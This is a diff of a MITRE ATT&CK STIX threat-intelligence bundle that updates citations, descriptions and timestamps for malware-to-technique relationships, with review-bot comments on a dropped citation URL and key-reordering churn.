+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.866Z",
+ "modified": "2020-06-16T20:51:13.406Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -42088,22 +43134,26 @@
{
"id": "relationship--f33725f4-cce5-4868-b494-d73419c76bdf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)",
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-23T22:01:45.946Z",
+ "modified": "2020-05-14T15:14:33.552Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
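Review bot: The DustySky external reference loses its `url` in this hunk — the old `"url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"` line is removed and only `source_name` and `description` survive on the new side, so the citation no longer resolves to a document for anyone following it. The same drop happens in the later hunk for the second DustySky relationship (the one targeting attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a). If this bundle is synced from the upstream CTI repository the change is presumably inherited and the fix belongs there; otherwise the `url` line should be kept alongside `source_name` and `description`. Worth confirming whether the link was dropped deliberately (dead link) before restoring it.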
@@ -42130,7 +43180,7 @@
{
"id": "relationship--4856de0a-2635-4081-97a8-3f15593c2aa5",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[FIN7](https://attack.mitre.org/groups/G0046) uses a PowerShell script to launch shellcode that retrieves an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)",
+ "description": "[FIN7](https://attack.mitre.org/groups/G0046) used a PowerShell script to launch shellcode that retrieved an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -42150,7 +43200,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
- "modified": "2019-06-30T23:13:18.381Z",
+ "modified": "2020-06-24T19:07:46.912Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -42188,12 +43238,12 @@
"url": "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks"
}
],
- "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5"
},
{
"id": "relationship--bbc31a33-f55f-43d4-a3fd-23426c5fc638",
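Review bot: This hunk changes only the position of `source_ref`, `relationship_type` and `target_ref` inside the object; JSON key order carries no meaning, so the change is pure diff churn, and the same pattern repeats in many later hunks on relationship objects that are otherwise untouched. If the file is regenerated rather than hand-edited, serializing with stable key ordering (e.g. `sort_keys=True` in Python's `json.dump`) would confine future diffs to the substantive edits — added citations, description rewrites, deleted relationships — and make them reviewable. This is a point about how the file is produced, not a defect in the data itself.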
@@ -42296,13 +43346,13 @@
"external_references": [
{
"url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
"source_name": "ESET RTM Feb 2017"
}
],
"description": "(Citation: ESET RTM Feb 2017)",
"type": "relationship",
- "modified": "2019-03-25T16:54:05.812Z",
+ "modified": "2020-05-12T22:13:16.808Z",
"created": "2017-05-31T21:33:27.081Z"
},
{
@@ -42513,12 +43563,12 @@
"url": "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/"
}
],
- "source_ref": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--a9bf9268-1c45-4293-a5c2-c493556ad546",
@@ -42728,16 +43778,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.631Z",
+ "modified": "2020-06-02T16:14:00.319Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -42931,7 +43981,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
"type": "relationship",
- "modified": "2020-03-29T23:30:21.522Z",
+ "modified": "2020-06-20T22:29:55.654Z",
"created": "2017-05-31T21:33:27.018Z"
},
{
@@ -42964,16 +44014,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.651Z",
+ "modified": "2020-04-21T23:09:31.336Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -43265,16 +44315,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
"type": "relationship",
- "modified": "2020-03-30T02:42:10.656Z",
+ "modified": "2020-04-21T23:09:31.022Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -43920,12 +44970,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99"
}
],
- "source_ref": "malware--039814a0-88de-46c5-a4fb-b293db21880a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--039814a0-88de-46c5-a4fb-b293db21880a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--e79c65f4-f9d2-4568-96a4-b6e00d3bad71",
@@ -44299,12 +45349,12 @@
"url": "https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00"
},
{
"id": "relationship--3a6c13d3-6589-4d33-9848-88e3409be0cc",
@@ -44461,7 +45511,7 @@
{
"id": "relationship--c4f662d6-7e47-4161-bf8d-dd445ae901b1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) captures screenshots of the infected system.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) captures screenshots of the infected system using the gdi32 library.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -44477,16 +45527,21 @@
"source_name": "Talos ROKRAT 2"
},
{
- "source_name": "Securelist ScarCruft May 2019",
+ "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.",
"url": "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019."
+ "source_name": "Securelist ScarCruft May 2019"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.202Z",
+ "modified": "2020-05-21T17:07:02.485Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -44561,7 +45616,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -44570,7 +45625,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.153Z",
+ "modified": "2020-04-16T19:41:40.516Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -44723,12 +45778,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
}
],
- "source_ref": "malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--b4c7e12f-6921-4007-ab15-595969bf9eca",
@@ -44948,14 +46003,14 @@
"target_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
],
"description": "(Citation: McAfee Honeybee)",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.313Z",
+ "modified": "2020-04-16T19:41:40.435Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -45636,15 +46691,20 @@
"description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"source_name": "TrendMicro Tropic Trooper Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created a hidden directory under C:\\ProgramData\\Apple\\Updates\\.(Citation: TrendMicro Tropic Trooper Mar 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created a hidden directory under C:\\ProgramData\\Apple\\Updates\\ and C:\\Users\\Public\\Documents\\Flash\\.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--4269342d-fd7b-4fc6-882f-5099da627c85",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.083Z",
+ "modified": "2020-05-21T14:55:00.348Z",
"created": "2019-01-29T20:17:49.308Z"
},
{
@@ -45766,12 +46826,12 @@
"url": "http://www.symantec.com/connect/blogs/trojanzeroaccessc-hidden-ntfs-ea"
}
],
- "source_ref": "malware--552462b9-ae79-49dd-855c-5973014e157f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--552462b9-ae79-49dd-855c-5973014e157f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -46322,12 +47382,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"
},
{
"id": "relationship--edaa004e-8239-40d8-a4f0-8849c4f0e87f",
@@ -46658,16 +47718,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.599Z",
+ "modified": "2020-04-21T23:09:31.029Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -47050,12 +48110,12 @@
"url": "https://technet.microsoft.com/en-us/library/cc732643.aspx"
}
],
- "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896"
},
{
"id": "relationship--41e52a99-9797-4c31-8b3c-7adeed98310a",
@@ -47183,27 +48243,6 @@
"modified": "2019-04-24T23:41:40.061Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "id": "relationship--e795d8ec-a11c-4809-a70a-46aa033fec82",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Chaos Stolen Backdoor",
- "description": "Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.",
- "url": "http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/"
- }
- ],
- "source_ref": "malware--5bcd5511-6756-4824-a692-e8bb109364af",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
- "type": "relationship",
- "modified": "2020-03-27T22:13:43.216Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--62f9aa2c-b0c1-4028-a2b8-c436e30ace4b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -47753,12 +48792,12 @@
"url": "http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml"
}
],
- "source_ref": "malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c"
},
{
"id": "relationship--e0999d7e-deec-446b-a86b-4c8988e20a96",
@@ -47898,7 +48937,7 @@
{
"id": "relationship--4eb00375-3ee3-43c7-845a-2206e1eff114",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) checks for debugging tools.(Citation: Talos Group123)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) checks for debugging tools.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -47907,13 +48946,18 @@
"url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.",
"source_name": "Talos Group123"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.221Z",
+ "modified": "2020-05-21T17:07:02.504Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -47946,16 +48990,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2020-03-16T17:48:06.663Z",
+ "modified": "2020-04-21T23:09:31.014Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -47987,7 +49031,7 @@
{
"id": "relationship--e7b5511a-3528-48d1-9224-6c5ff88b3825",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Winnti](https://attack.mitre.org/software/S0141) implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.(Citation: Microsoft Winnti Jan 2017)",
+ "description": "A [Winnti for Windows](https://attack.mitre.org/software/S0141) implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.(Citation: Microsoft Winnti Jan 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -48012,12 +49056,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--a901eaf4-7cbe-43c2-9c03-7d716357edc9",
@@ -48248,22 +49292,27 @@
{
"id": "relationship--5e6e745f-d756-4b6e-90e1-3adcf848570b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)",
+ "description": "If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "FireEye Shamoon Nov 2016",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html",
"description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.",
- "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"
+ "source_name": "FireEye Shamoon Nov 2016"
+ },
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
"type": "relationship",
- "modified": "2020-03-16T18:58:45.652Z",
+ "modified": "2020-05-29T18:11:23.456Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -48610,12 +49659,12 @@
"url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
}
],
- "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9"
},
{
"id": "relationship--14639d10-6371-4e84-a637-a0e5846cb053",
@@ -48709,7 +49758,7 @@
{
"id": "relationship--f832e042-6859-4415-9b6c-4e093dc955ec",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT19](https://attack.mitre.org/groups/G0073) used Regsvr32 to bypass application whitelisting techniques.(Citation: FireEye APT19)",
+ "description": "[APT19](https://attack.mitre.org/groups/G0073) used Regsvr32 to bypass application control techniques.(Citation: FireEye APT19)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -48724,7 +49773,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"type": "relationship",
- "modified": "2019-04-25T11:39:52.084Z",
+ "modified": "2020-06-20T22:48:29.688Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -48737,7 +49786,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
